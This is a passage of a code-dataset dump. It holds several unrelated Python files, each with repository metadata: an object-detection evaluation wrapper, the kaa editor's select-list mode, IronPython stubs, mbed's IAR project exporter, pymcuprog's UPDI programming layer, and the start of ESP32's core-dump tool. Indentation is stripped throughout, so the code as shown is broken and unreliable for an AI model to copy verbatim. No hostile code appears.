gt_boxes = self._filter_boxes(self.gt_boxes, min_z=min_z, max_z=max_z, verbose=self.verbose)
pred_boxes = self._filter_boxes(self.pred_boxes, min_z=min_z, max_z=max_z, verbose=self.verbose)
# -----------------------------------
# Step 1: Accumulate metric data for all classes and distance thresholds.
# -----------------------------------
if self.verbose:
print('Accumulating metric data...')
metric_data_list = DetectionMetricDataList()
for rel_dist_th in rel_dist_ths_:
matches = match_boxes(gt_boxes, pred_boxes, dist_fcn=center_distance, rel_dist_th=rel_dist_th,
dist_th=0.25)
for class_name in self.cfg.class_names:
md = stats_from_matches(matches, class_name)
metric_data_list.set(class_name, rel_dist_th, md)
# -----------------------------------
# Step 2: Calculate metrics from the data.
# -----------------------------------
if self.verbose:
print('Calculating metrics...')
metrics = DetectionMetrics(self.cfg)
for class_name in self.cfg.class_names:
# Compute APs.
for rel_dist_th in rel_dist_ths:
metric_data = metric_data_list[(class_name, rel_dist_th)]
ap = calc_ap(metric_data, self.cfg.min_recall, self.cfg.min_precision)
metrics.add_label_ap(class_name, rel_dist_th, ap)
# Compute TP metrics.
for metric_name in TP_METRICS:
metric_data = metric_data_list[(class_name, rel_tp_dist_th)]
if class_name in ['traffic_cone'] and metric_name in ['attr_err', 'vel_err', 'orient_err']:
tp = np.nan
elif class_name in ['barrier'] and metric_name in ['attr_err', 'vel_err']:
tp = np.nan
else:
tp = calc_tp(metric_data, self.cfg.min_recall, metric_name)
metrics.add_label_tp(class_name, metric_name, tp)
return metrics, metric_data_list
def _filter_boxes(self,
boxes: EvalBoxes,
min_z: float,
max_z: float,
verbose: bool = False) -> EvalBoxes:
"""
Applies filtering to boxes based on the Z value.
:param boxes: An instance of the EvalBoxes class to be filtered.
:param min_z: Min allowed Z.
:param max_z: Max allowed Z.
:param verbose: Whether to print to stdout.
"""
boxes = deepcopy(boxes)
# Accumulators for number of filtered boxes.
total, dist_filter = 0, 0
for ind, sample_token in enumerate(boxes.sample_tokens):
# Filter on distance.
total += len(boxes[sample_token])
boxes.boxes[sample_token] = [box for box in boxes[sample_token] if
max_z >= box.translation[1] >= min_z]
dist_filter += len(boxes[sample_token])
if verbose:
print("=> Original number of boxes: %d" % total)
print("=> After distance based filtering: %d" % dist_filter)
return boxes
def __call__(self, min_z: float, max_z: float, rel_dist_thresholds: List[float], rel_tp_dist_threshold: float) -> Dict[str, Any]:
"""
Main function that loads the evaluation code, visualizes samples, runs the evaluation.
:param min_z: Min allowed Z. Filters boxes whose Z value is less than this.
:param max_z: Max allowed Z. Filter boxes whose Z value is more than this.
:param rel_dist_thresholds: Relative distance thresholds needed for matching GT to predictions, and then APs are averaged.
:param rel_tp_dist_threshold: Relative distance threshold for the true positive metric.
:return: A dict that stores the high-level metrics and meta data.
"""
# Run evaluation.
metrics, metric_data_list = self._evaluate(min_z=min_z, max_z=max_z, rel_dist_ths=rel_dist_thresholds, rel_tp_dist_th=rel_tp_dist_threshold)
metrics_summary = metrics.serialize()
if self.verbose:
# Print per-class metrics.
print('Object Class\tAP\tATE\tASE\tAOE')
class_aps = metrics_summary[self.AP_ERRORS]
class_tps = metrics_summary[self.TP_ERRORS]
for class_name in class_aps.keys():
if class_name.lower() in ["car", "pedestrian"]:
print('%s \t%.3f\t%.3f\t%.3f\t%.3f'
% (class_name, class_aps[class_name],
class_tps[class_name][self.TRANSLATION_ERROR],
class_tps[class_name][self.SCALE_ERROR],
class_tps[class_name][self.ORIENTATION_ERROR]))
return metrics_summary
if __name__ == "__main__":
# Try eval code.
# todo|note specify the path which has numpy files with predictions and gt data.
# You can find an example here: gs://reco-tf-out/tmp/alok/data-links/data.npy, which has predictions from encoded GT.
data = np.load('/numpy/data/path', allow_pickle=True).item()
_gt_boxes, _pred_boxes = data['gt'], data['pred']
nusc_eval = DetectionEvalWrapper(gt_boxes=_gt_boxes, pred_boxes=_pred_boxes, verbose=True)
for _min_z, _max_z in zip([0, 0, 20, 40, 60, 80], [100, 20, 40, 60, 80, 100]):
rel_ap_thresholds = [0.05]
print(f"Range of prediction and detections: min_z: {_min_z}, max_z: {_max_z}")
print(f"relative AP_thresholds: {rel_ap_thresholds}")
metrics_summary = nusc_eval(min_z=_min_z, max_z=_max_z, rel_dist_thresholds=rel_ap_thresholds, rel_tp_dist_threshold=0.05)
| 44.880184
| 154
| 0.624705
|
41ee1cd723c81ab4770567d1688f6df6e1fc8512
| 4,217
|
py
|
Python
|
kaa/ui/selectlist/selectlist.py
|
tnhung2011/kaa
|
e6a8819a5ecba04b7db8303bd5736b5a7c9b822d
|
[
"Unlicense"
] | 82
|
2015-01-26T15:34:03.000Z
|
2021-12-03T14:34:23.000Z
|
kaa/ui/selectlist/selectlist.py
|
tnhung2011/kaa
|
e6a8819a5ecba04b7db8303bd5736b5a7c9b822d
|
[
"Unlicense"
] | 34
|
2015-02-09T08:13:05.000Z
|
2021-04-08T08:19:05.000Z
|
kaa/ui/selectlist/selectlist.py
|
tnhung2011/kaa
|
e6a8819a5ecba04b7db8303bd5736b5a7c9b822d
|
[
"Unlicense"
] | 15
|
2015-05-21T07:41:17.000Z
|
2021-10-16T13:33:22.000Z
|
import collections
from kaa import document
from kaa.ui.dialog import dialogmode
from kaa.keyboard import *
from kaa.command import commandid, norec, norerun
SelectItem = collections.namedtuple(
'SelectItem', ['style', 'activestyle', 'text', 'value'])
selectlist_keys = {
down: 'selectitemlist.next',
(ctrl, 'n'): 'selectitemlist.next',
(ctrl, 'f'): 'selectitemlist.next',
tab: 'selectitemlist.next',
up: 'selectitemlist.prev',
(ctrl, 'p'): 'selectitemlist.prev',
(ctrl, 'b'): 'selectitemlist.prev',
(shift, tab): 'selectitemlist.prev',
}
class SelectItemList(dialogmode.DialogMode):
USE_UNDO = False
NO_WRAPINDENT = False
CAPTION_STYLE = 'caption'
items = ()
cursel = None
filterfunc = None
caption = None
SEP = ' '
@classmethod
def build(cls):
doc = document.Document()
mode = cls()
doc.setmode(mode)
return doc
def is_cursor_visible(self):
return 0 # hide cursor
def init_keybind(self):
super().init_keybind()
self.keybind.add_keybind(selectlist_keys)
def on_str(self, wnd, s, overwrite=False):
pass
def calc_height(self, wnd):
height = wnd.screen.get_total_height(wnd.mainframe.height // 2)
return height
def update_doc(self, items):
self.items = list(collections.OrderedDict((i, 1)
for i in items).keys())
self.cursel = None
self.document.marks.clear()
self.document.delete(0, self.document.endpos())
with dialogmode.FormBuilder(self.document) as f:
if self.caption:
f.append_text(self.CAPTION_STYLE, self.caption + ':\n')
for n, item in enumerate(self.items):
f.append_text(item.style, item.text, mark_pair=item)
if n != (len(self.items) - 1):
f.append_text('default', self.SEP)
def _update_item_style(
self, wnd, item, activate, middle=None, bottom=None):
if item not in self.document.marks:
return
if activate:
style = item.activestyle
else:
style = item.style
f, t = self.document.marks[item]
self.document.setstyles(f, t, self.get_styleid(style))
if activate:
wnd.screen.apply_updates()
top = not middle and not bottom
wnd.screen.locate(f, top=top, middle=middle, bottom=bottom)
wnd.update_window()
def update_sel(self, wnd, newsel, middle=None, bottom=None):
if self.cursel is not None:
self._update_item_style(wnd, self.cursel, False)
if newsel is not None:
self._update_item_style(wnd, newsel, True,
middle=middle, bottom=bottom)
self.cursel = newsel
@commandid('selectitemlist.next')
@norec
@norerun
def sel_next(self, wnd):
if not self.items:
newsel = None
elif self.cursel is None:
newsel = self.items[0]
else:
try:
idx = self.items.index(self.cursel)
except ValueError:
newsel = self.items[0]
else:
if idx < len(self.items) - 1:
newsel = self.items[idx + 1]
else:
newsel = self.items[0]
self.update_sel(wnd, newsel, bottom=True)
return newsel
@commandid('selectitemlist.prev')
@norec
@norerun
def sel_prev(self, wnd):
bottom = None
if not self.items:
newsel = None
elif self.cursel is None:
newsel = self.items[-1]
bottom = True
else:
try:
idx = self.items.index(self.cursel)
except ValueError:
newsel = self.items[-1]
bottom = True
else:
if idx > 0:
newsel = self.items[idx - 1]
else:
newsel = self.items[-1]
bottom = True
self.update_sel(wnd, newsel, bottom=bottom)
return newsel
| 28.493243
| 73
| 0.548968
|
a09c04da72c10679bbb1107e5106397be30deb15
| 1,303
|
py
|
Python
|
release/stubs.min/System/Drawing/Configuration.py
|
tranconbv/ironpython-stubs
|
a601759e6c6819beff8e6b639d18a24b7e351851
|
[
"MIT"
] | null | null | null |
release/stubs.min/System/Drawing/Configuration.py
|
tranconbv/ironpython-stubs
|
a601759e6c6819beff8e6b639d18a24b7e351851
|
[
"MIT"
] | null | null | null |
release/stubs.min/System/Drawing/Configuration.py
|
tranconbv/ironpython-stubs
|
a601759e6c6819beff8e6b639d18a24b7e351851
|
[
"MIT"
] | null | null | null |
# encoding: utf-8
# module System.Drawing.Configuration calls itself Configuration
# from System.Drawing,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a
# by generator 1.145
# no doc
# no imports
# no functions
# classes
class SystemDrawingSection(ConfigurationSection):
""" SystemDrawingSection() """
def Instance(self):
""" This function has been arbitrarily put into the stubs"""
return SystemDrawingSection()
BitmapSuffix=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Get: BitmapSuffix(self: SystemDrawingSection) -> str
Set: BitmapSuffix(self: SystemDrawingSection)=value
"""
ElementProperty=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the System.Configuration.ConfigurationElementProperty object that represents the System.Configuration.ConfigurationElement object itself.
"""
EvaluationContext=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the System.Configuration.ContextInformation object for the System.Configuration.ConfigurationElement object.
"""
HasContext=property(lambda self: object(),lambda self,v: None,lambda self: None)
Properties=property(lambda self: object(),lambda self,v: None,lambda self: None)
| 33.410256
| 148
| 0.753645
|
e07d7d992629943db97eaa0fbf1f57112ff004b7
| 6,252
|
py
|
Python
|
mbed-os/tools/export/iar/__init__.py
|
ghsecuritylab/BLEClient_mbedDevConn_Watson
|
f162ec8a99ab3b21cee28aaed65da60cf5dd6618
|
[
"Apache-2.0"
] | 1
|
2019-05-28T04:54:23.000Z
|
2019-05-28T04:54:23.000Z
|
mbed-os/tools/export/iar/__init__.py
|
ghsecuritylab/BLEClient_mbedDevConn_Watson
|
f162ec8a99ab3b21cee28aaed65da60cf5dd6618
|
[
"Apache-2.0"
] | 1
|
2017-02-20T10:48:02.000Z
|
2017-02-21T11:34:16.000Z
|
mbed-os/tools/export/iar/__init__.py
|
ghsecuritylab/BLEClient_mbedDevConn_Watson
|
f162ec8a99ab3b21cee28aaed65da60cf5dd6618
|
[
"Apache-2.0"
] | 3
|
2017-02-07T15:06:06.000Z
|
2021-02-19T13:56:31.000Z
|
import os
from os.path import sep, join, exists
from collections import namedtuple
from subprocess import Popen, PIPE
import shutil
import re
import sys
from tools.targets import TARGET_MAP
from tools.export.exporters import Exporter
import json
from tools.export.cmsis import DeviceCMSIS
from multiprocessing import cpu_count
class IAR(Exporter):
NAME = 'iar'
TOOLCHAIN = 'IAR'
#iar_definitions.json location
def_loc = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '..', '..', '..',
'tools','export', 'iar', 'iar_definitions.json')
#create a dictionary of the definitions
with open(def_loc, 'r') as f:
IAR_DEFS = json.load(f)
#supported targets have a device name and corresponding definition in
#iar_definitions.json
TARGETS = [target for target, obj in TARGET_MAP.iteritems()
if hasattr(obj, 'device_name') and
obj.device_name in IAR_DEFS.keys() and "IAR" in obj.supported_toolchains
and DeviceCMSIS.check_supported(target)]
SPECIAL_TEMPLATES = {
'rz_a1h' : 'iar/iar_rz_a1h.ewp.tmpl',
'nucleo_f746zg' : 'iar/iar_nucleo_f746zg.ewp.tmpl'
}
def iar_groups(self, grouped_src):
"""Return a namedtuple of group info
Positional Arguments:
grouped_src: dictionary mapping a group(str) to sources
within it (list of file names)
Relevant part of IAR template
{% for group in groups %}
<group>
<name>group.name</name>
{% for file in group.files %}
<file>
<name>$PROJ_DIR${{file}}</name>
</file>
{% endfor %}
</group>
{% endfor %}
"""
IARgroup = namedtuple('IARgroup', ['name','files'])
groups = []
for name, files in grouped_src.items():
groups.append(IARgroup(name,files))
return groups
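    # Illustrative note (not part of the original exporter): for a hypothetical
    # grouping such as {'drivers': ['uart.c', 'spi.c']}, iar_groups returns
    # [IARgroup(name='drivers', files=['uart.c', 'spi.c'])], and the .ewp
    # template quoted above expands each namedtuple into one <group> element.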
def iar_device(self):
"""Retrieve info from iar_definitions.json"""
device_name = TARGET_MAP[self.target].device_name
device_info = self.IAR_DEFS[device_name]
iar_defaults ={
"OGChipSelectEditMenu": "",
"CoreVariant": '',
"GFPUCoreSlave": '',
"GFPUCoreSlave2": 40,
"GBECoreSlave": 35
}
iar_defaults.update(device_info)
IARdevice = namedtuple('IARdevice', iar_defaults.keys())
return IARdevice(**iar_defaults)
def format_file(self, file):
"""Make IAR compatible path"""
return join('$PROJ_DIR$',file)
def format_src(self, srcs):
"""Group source files"""
grouped = self.group_project_files(srcs)
for group, files in grouped.items():
grouped[group] = [self.format_file(src) for src in files]
return grouped
def get_ewp_template(self):
return self.SPECIAL_TEMPLATES.get(self.target.lower(), 'iar/ewp.tmpl')
def generate(self):
"""Generate the .eww, .ewd, and .ewp files"""
srcs = self.resources.headers + self.resources.s_sources + \
self.resources.c_sources + self.resources.cpp_sources + \
self.resources.objects + self.resources.libraries
flags = self.flags
flags['c_flags'] = list(set(flags['common_flags']
+ flags['c_flags']
+ flags['cxx_flags']))
if '--vla' in flags['c_flags']:
flags['c_flags'].remove('--vla')
if '--no_static_destruction' in flags['c_flags']:
flags['c_flags'].remove('--no_static_destruction')
#Optimizations
if '-Oh' in flags['c_flags']:
flags['c_flags'].remove('-Oh')
ctx = {
'name': self.project_name,
'groups': self.iar_groups(self.format_src(srcs)),
'linker_script': self.format_file(self.resources.linker_script),
'include_paths': [self.format_file(src) for src in self.resources.inc_dirs],
'device': self.iar_device(),
'ewp': sep+self.project_name + ".ewp",
'debugger': DeviceCMSIS(self.target).debug.replace('-','').upper()
}
ctx.update(flags)
self.gen_file('iar/eww.tmpl', ctx, self.project_name+".eww")
self.gen_file('iar/ewd.tmpl', ctx, self.project_name + ".ewd")
self.gen_file(self.get_ewp_template(), ctx, self.project_name + ".ewp")
@staticmethod
def build(project_name, log_name="build_log.txt", cleanup=True):
""" Build IAR project """
# > IarBuild [project_path] -build [project_name]
proj_file = project_name + ".ewp"
cmd = ["IarBuild", proj_file, '-build', project_name]
# IAR does not support a '0' option to automatically use all
# available CPUs, so we use Python's multiprocessing library
# to detect the number of CPUs available
cpus_available = cpu_count()
jobs = cpus_available if cpus_available else None
# Only add the parallel flag if we're using more than one CPU
if jobs:
cmd += ['-parallel', str(jobs)]
# Build the project
p = Popen(cmd, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
ret_code = p.returncode
out_string = "=" * 10 + "STDOUT" + "=" * 10 + "\n"
out_string += out
out_string += "=" * 10 + "STDERR" + "=" * 10 + "\n"
out_string += err
if ret_code == 0:
out_string += "SUCCESS"
else:
out_string += "FAILURE"
print out_string
if log_name:
# Write the output to the log file
with open(log_name, 'w+') as f:
f.write(out_string)
# Cleanup the exported and built files
if cleanup:
os.remove(project_name + ".ewp")
os.remove(project_name + ".ewd")
os.remove(project_name + ".eww")
# legacy output file location
if exists('.build'):
shutil.rmtree('.build')
if exists('BUILD'):
shutil.rmtree('BUILD')
if ret_code !=0:
# Seems like something went wrong.
return -1
else:
return 0
| 34.927374
| 88
| 0.580294
|
cf08de47d09ec22209a3aab1f70c911b7720cd5d
| 12,547
|
py
|
Python
|
pymcuprog/serialupdi/application.py
|
KrystianD-contribution/pymcuprog
|
a9411a8e4a5db8b54517c51da0bae96bf8385a65
|
[
"MIT"
] | 28
|
2021-05-08T19:28:33.000Z
|
2022-03-23T06:23:13.000Z
|
pymcuprog/serialupdi/application.py
|
KrystianD-contribution/pymcuprog
|
a9411a8e4a5db8b54517c51da0bae96bf8385a65
|
[
"MIT"
] | 20
|
2021-05-24T19:20:39.000Z
|
2022-03-12T20:10:30.000Z
|
pymcuprog/serialupdi/application.py
|
KrystianD-contribution/pymcuprog
|
a9411a8e4a5db8b54517c51da0bae96bf8385a65
|
[
"MIT"
] | 11
|
2021-06-24T20:59:16.000Z
|
2022-03-23T23:59:38.000Z
|
"""
Application layer for UPDI stack
"""
from logging import getLogger
from pymcuprog.pymcuprog_errors import PymcuprogError
from . import constants
from .link import UpdiDatalink16bit, UpdiDatalink24bit
from .nvm import NvmUpdi, NvmUpdiV0, NvmUpdiAvrV2, NvmUpdiAvrV3
from .readwrite import UpdiReadWrite
from .physical import UpdiPhysical
from .timeout import Timeout
def decode_sib(sib):
"""
Turns the SIB into something readable
:param sib: SIB data to decode
"""
sib_info = {}
logger = getLogger(__name__)
# Do some simple checks:
try:
# SIB should contain only ASCII characters
sib_string = sib.decode('ascii')
except UnicodeDecodeError:
logger.error("SIB read returned invalid characters")
return None
# Vital information is stored in the first 19 characters
if len(sib_string) < 19:
logger.error("SIB read returned incomplete string")
return None
logger.info("SIB: '%s'", sib_string)
# Parse fixed width fields according to spec
family = sib[0:7].strip().decode()
logger.info("Device family ID: '%s'", family)
sib_info['family'] = family
nvm = sib[8:11].strip().decode()
logger.info("NVM interface: '%s'", nvm)
sib_info['NVM'] = nvm.split(':')[1]
ocd = sib[11:14].strip().decode()
logger.info("Debug interface: '%s'", ocd)
sib_info['OCD'] = ocd.split(':')[1]
osc = sib[15:19].strip().decode()
logger.info("PDI oscillator: '%s'", osc)
sib_info['OSC'] = osc
extra = sib[19:].strip().decode()
logger.info("Extra info: '%s'", extra)
sib_info['extra'] = extra
return sib_info
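# Hedged usage sketch (illustrative only, not part of the original module):
# decode_sib() is normally fed the raw bytes returned by UpdiReadWrite.read_sib();
# a None return means the SIB could not be parsed and the caller should retry.
#
#   sib_info = decode_sib(readwrite.read_sib())   # 'readwrite' is a hypothetical UpdiReadWrite
#   if sib_info is not None:
#       nvm_rev = sib_info['NVM']   # '0', '2' or '3' selects the NVM driver below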
class UpdiApplication:
"""
Generic application layer for UPDI
"""
def __init__(self, serialport, baud, device=None):
self.logger = getLogger(__name__)
self.device = device
# Build the UPDI stack:
# Create a physical
self.phy = UpdiPhysical(serialport, baud)
# Create a DL - use 16-bit until otherwise known
datalink = UpdiDatalink16bit()
# Set the physical for use in the datalink
datalink.set_physical(self.phy)
# Init (active) the datalink
datalink.init_datalink()
# Create a read write access layer using this data link
self.readwrite = UpdiReadWrite(datalink)
# Create an NVM driver
self.nvm = NvmUpdi(self.readwrite, self.device)
def read_device_info(self):
"""
Reads out device information from various sources
"""
sib = self.readwrite.read_sib()
sib_info = decode_sib(sib)
# Unable to read SIB?
if sib_info is None:
self.logger.warning("Unable to read SIB from device; attempting double-break recovery...")
# Send double break and try again
self.phy.send_double_break()
sib = self.readwrite.read_sib()
sib_info = decode_sib(sib)
if sib_info is None:
self.logger.error("Double-break recovery failed. Unable to contact device.")
raise PymcuprogError("Failed to read device info.")
# Select correct NVM driver:
# P:0 = tiny0, mega0 (16-bit, page oriented)
# P:1 = N/A
# P:2 = AVR DA, DB, DD (24-bit, word-oriented)
# P:3 = AVR EA (16-bit, page oriented)
if sib_info['NVM'] == '0':
self.logger.info("NVM type 0: 16-bit, page oriented write")
# DL is correctly configured already
# Create new NVM driver
self.nvm = NvmUpdiV0(self.readwrite, self.device)
elif sib_info['NVM'] == '2':
# This is a Dx-family member, and needs new DL and NVM
self.logger.info("NVM type 2: 24-bit, word oriented write")
# Create new DL
datalink = UpdiDatalink24bit()
# Use the existing PHY
datalink.set_physical(self.phy)
# And re-init
datalink.init_datalink()
# Create a read write access layer using this data link
self.readwrite = UpdiReadWrite(datalink)
# Create new NVM driver
self.nvm = NvmUpdiAvrV2(self.readwrite, self.device)
elif sib_info['NVM'] == '3':
self.logger.info("NVM type 3: 16-bit, page oriented")
# DL is correctly configured already
# Create new NVM driver
self.nvm = NvmUpdiAvrV3(self.readwrite, self.device)
else:
self.logger.error("Unsupported NVM revision - update pymcuprog.")
self.logger.info("PDI revision = 0x%02X", self.readwrite.read_cs(constants.UPDI_CS_STATUSA) >> 4)
if self.in_prog_mode():
if self.device is not None:
devid = self.read_data(self.device.sigrow_address, 3)
devrev = self.read_data(self.device.syscfg_address + 1, 1)
self.logger.info("Device ID from pyupdi = '%02X%02X%02X' rev '%s'", devid[0], devid[1], devid[2],
chr(ord('A') + devrev[0]))
return sib_info
def read_data(self, address, size):
"""
Reads a number of bytes of data from UPDI
:param address: address to write to
:param size: number of bytes to read
"""
return self.readwrite.read_data(address, size)
def read_data_words(self, address, words):
"""
Reads a number of words of data from UPDI
:param address: address to write to
:param words: number of words to read
"""
return self.readwrite.read_data_words(address, words)
def write_data_words(self, address, data):
"""
Writes a number of words to memory
:param address: address to write to
:param data: data to write
"""
return self.readwrite.write_data_words(address, data)
def write_data(self, address, data):
"""
Writes a number of bytes to memory
:param address: address to write to
:param data: data to write
"""
        return self.readwrite.write_data(address, data)
def in_prog_mode(self):
"""
Checks whether the NVM PROG flag is up
"""
if self.readwrite.read_cs(constants.UPDI_ASI_SYS_STATUS) & (1 << constants.UPDI_ASI_SYS_STATUS_NVMPROG):
return True
return False
def wait_unlocked(self, timeout_ms):
"""
Waits for the device to be unlocked.
All devices boot up as locked until proven otherwise
:param timeout_ms: number of milliseconds to wait
"""
timeout = Timeout(timeout_ms)
while not timeout.expired():
if not self.readwrite.read_cs(constants.UPDI_ASI_SYS_STATUS) & (
1 << constants.UPDI_ASI_SYS_STATUS_LOCKSTATUS):
return True
self.logger.error("Timeout waiting for device to unlock")
return False
def wait_urow_prog(self, timeout_ms, wait_for_high):
"""
Waits for the device to be in user row write mode
User row is writeable on a locked device using this mechanism
:param timeout_ms: number of milliseconds to wait
:param wait_for_high: set True to wait for bit to go high; False to wait for low
"""
timeout = Timeout(timeout_ms)
while not timeout.expired():
status = self.readwrite.read_cs(constants.UPDI_ASI_SYS_STATUS)
if wait_for_high:
if status & (1 << constants.UPDI_ASI_SYS_STATUS_UROWPROG):
return True
else:
if not status & (1 << constants.UPDI_ASI_SYS_STATUS_UROWPROG):
return True
self.logger.error("Timeout waiting for device to enter UROW WRITE mode")
return False
def unlock(self):
"""
Unlock by chip erase
"""
# Put in the key
self.readwrite.write_key(constants.UPDI_KEY_64, constants.UPDI_KEY_CHIPERASE)
# Check key status
key_status = self.readwrite.read_cs(constants.UPDI_ASI_KEY_STATUS)
self.logger.debug("Key status = 0x%02X", key_status)
if not key_status & (1 << constants.UPDI_ASI_KEY_STATUS_CHIPERASE):
raise PymcuprogError("Key not accepted")
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
# And wait for unlock
if not self.wait_unlocked(500):
raise PymcuprogError("Failed to chip erase using key")
def write_user_row_locked_device(self, address, data):
"""
Writes data to the user row when the device is locked, using a key.
"""
# Put in the key
self.readwrite.write_key(constants.UPDI_KEY_64, constants.UPDI_KEY_UROW)
# Check key status
key_status = self.readwrite.read_cs(constants.UPDI_ASI_KEY_STATUS)
self.logger.debug("Key status = 0x%02X", key_status)
if not key_status & (1 << constants.UPDI_ASI_KEY_STATUS_UROWWRITE):
raise PymcuprogError("Key not accepted")
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
# Wait for mode to be entered
if not self.wait_urow_prog(500, wait_for_high=True):
raise PymcuprogError("Failed to enter urow write mode using key")
        # At this point we can write one 'page' to the device, and have it transferred into the user row
# Transfer data
self.readwrite.write_data(address, data)
# Finalize
self.readwrite.write_cs(constants.UPDI_ASI_SYS_CTRLA,
(1 << constants.UPDI_ASI_SYS_CTRLA_UROW_FINAL) |
(1 << constants.UPDI_CTRLB_CCDETDIS_BIT))
# Wait for mode to be exited
if not self.wait_urow_prog(500, wait_for_high=False):
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
raise PymcuprogError("Failed to exit urow write mode")
# Clear status
self.readwrite.write_cs(constants.UPDI_ASI_KEY_STATUS,
(1 << constants.UPDI_ASI_KEY_STATUS_UROWWRITE) |
(1 << constants.UPDI_CTRLB_CCDETDIS_BIT))
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
def enter_progmode(self):
"""
Enters into NVM programming mode
"""
# First check if NVM is already enabled
if self.in_prog_mode():
self.logger.info("Already in NVM programming mode")
return True
self.logger.info("Entering NVM programming mode")
# Put in the key
self.readwrite.write_key(constants.UPDI_KEY_64, constants.UPDI_KEY_NVM)
# Check key status
key_status = self.readwrite.read_cs(constants.UPDI_ASI_KEY_STATUS)
self.logger.debug("Key status = 0x%02X", key_status)
if not key_status & (1 << constants.UPDI_ASI_KEY_STATUS_NVMPROG):
self.logger.error("Key status = 0x%02X", key_status)
raise IOError("Key not accepted")
# Toggle reset
self.reset(apply_reset=True)
self.reset(apply_reset=False)
# And wait for unlock
if not self.wait_unlocked(100):
raise IOError("Failed to enter NVM programming mode: device is locked")
# Check for NVMPROG flag
if not self.in_prog_mode():
raise IOError("Failed to enter NVM programming mode")
self.logger.debug("Now in NVM programming mode")
return True
def leave_progmode(self):
"""
Disables UPDI which releases any keys enabled
"""
self.logger.info("Leaving NVM programming mode")
self.reset(apply_reset=True)
self.reset(apply_reset=False)
self.readwrite.write_cs(constants.UPDI_CS_CTRLB,
(1 << constants.UPDI_CTRLB_UPDIDIS_BIT) | (1 << constants.UPDI_CTRLB_CCDETDIS_BIT))
def reset(self, apply_reset):
"""
Applies or releases an UPDI reset condition
:param apply_reset: True to apply, False to release
"""
if apply_reset:
self.logger.info("Apply reset")
self.readwrite.write_cs(constants.UPDI_ASI_RESET_REQ, constants.UPDI_RESET_REQ_VALUE)
else:
self.logger.info("Release reset")
self.readwrite.write_cs(constants.UPDI_ASI_RESET_REQ, 0x00)
| 34.949861
| 115
| 0.61441
|
00192650405c5d6fe5d1f6544212b973c6ed10b5
| 13,221
|
py
|
Python
|
components/espcoredump/espcoredump.py
|
mbrunnen/hal_espressif
|
4f2f7d18a5be962ad0c8bcb3e9fbe010d9df80ee
|
[
"Apache-2.0"
] | 7
|
2020-12-10T14:48:17.000Z
|
2022-03-09T14:58:06.000Z
|
components/espcoredump/espcoredump.py
|
mbrunnen/hal_espressif
|
4f2f7d18a5be962ad0c8bcb3e9fbe010d9df80ee
|
[
"Apache-2.0"
] | 24
|
2020-12-10T11:29:39.000Z
|
2022-03-21T16:18:12.000Z
|
components/espcoredump/espcoredump.py
|
mbrunnen/hal_espressif
|
4f2f7d18a5be962ad0c8bcb3e9fbe010d9df80ee
|
[
"Apache-2.0"
] | 16
|
2020-12-10T11:11:20.000Z
|
2022-02-22T12:59:19.000Z
|
#!/usr/bin/env python
#
# ESP32 core dump Utility
import argparse
import logging
import os
import subprocess
import sys
from shutil import copyfile
from construct import GreedyRange, Int32ul, Struct
from corefile import __version__, xtensa
from corefile.elf import TASK_STATUS_CORRECT, ElfFile, ElfSegment, ESPCoreDumpElfFile, EspTaskStatus
from corefile.gdb import EspGDB
from corefile.loader import ESPCoreDumpFileLoader, ESPCoreDumpFlashLoader
from pygdbmi.gdbcontroller import DEFAULT_GDB_TIMEOUT_SEC
IDF_PATH = os.getenv('IDF_PATH')
if not IDF_PATH:
sys.stderr.write('IDF_PATH is not found! Set proper IDF_PATH in environment.\n')
sys.exit(2)
sys.path.insert(0, os.path.join(IDF_PATH, 'components', 'esptool_py', 'esptool'))
try:
import esptool
except ImportError:
sys.stderr.write('esptool is not found!\n')
sys.exit(2)
if os.name == 'nt':
CLOSE_FDS = False
else:
CLOSE_FDS = True
def load_aux_elf(elf_path): # type: (str) -> (ElfFile, str)
"""
Loads auxiliary ELF file and composes GDB command to read its symbols.
"""
elf = None
sym_cmd = ''
if os.path.exists(elf_path):
elf = ElfFile(elf_path)
for s in elf.sections:
if s.name == '.text':
sym_cmd = 'add-symbol-file %s 0x%x' % (elf_path, s.addr)
return elf, sym_cmd
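# Illustrative note (not part of the original script): for a ROM ELF whose .text
# section starts at a hypothetical address 0x40000000, load_aux_elf() returns a
# command string like "add-symbol-file esp32_rom.elf 0x40000000", which is later
# handed to GDB so ROM symbols resolve in backtraces.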
def core_prepare():
loader = None
core_filename = None
if not args.core:
# Core file not specified, try to read core dump from flash.
loader = ESPCoreDumpFlashLoader(args.off, port=args.port, baud=args.baud)
elif args.core_format != 'elf':
# Core file specified, but not yet in ELF format. Convert it from raw or base64 into ELF.
loader = ESPCoreDumpFileLoader(args.core, args.core_format == 'b64')
else:
# Core file is already in the ELF format
core_filename = args.core
# Load/convert the core file
if loader:
loader.create_corefile(exe_name=args.prog)
core_filename = loader.core_elf_file.name
if args.save_core:
# We got asked to save the core file, make a copy
copyfile(loader.core_elf_file.name, args.save_core)
return core_filename, loader
def dbg_corefile():
"""
    Command to load core dump from file or flash and run a GDB debug session with it
"""
rom_elf, rom_sym_cmd = load_aux_elf(args.rom_elf)
core_filename, loader = core_prepare()
p = subprocess.Popen(bufsize=0,
args=[args.gdb,
'--nw', # ignore .gdbinit
'--core=%s' % core_filename, # core file,
'-ex', rom_sym_cmd,
args.prog],
stdin=None, stdout=None, stderr=None,
close_fds=CLOSE_FDS)
p.wait()
print('Done!')
def info_corefile():
"""
    Command to load core dump from file or flash and print its data in a user-friendly form
"""
core_filename, loader = core_prepare()
exe_elf = ElfFile(args.prog)
core_elf = ESPCoreDumpElfFile(core_filename)
if exe_elf.e_machine != core_elf.e_machine:
raise ValueError('The arch should be the same between core elf and exe elf')
if core_elf.e_machine == ESPCoreDumpElfFile.EM_XTENSA:
exception_registers_info = xtensa.print_exc_regs_info
else:
raise NotImplementedError
extra_note = None
task_info = []
for seg in core_elf.note_segments:
for note_sec in seg.note_secs:
if note_sec.type == ESPCoreDumpElfFile.PT_EXTRA_INFO and 'EXTRA_INFO' in note_sec.name.decode('ascii'):
extra_note = note_sec
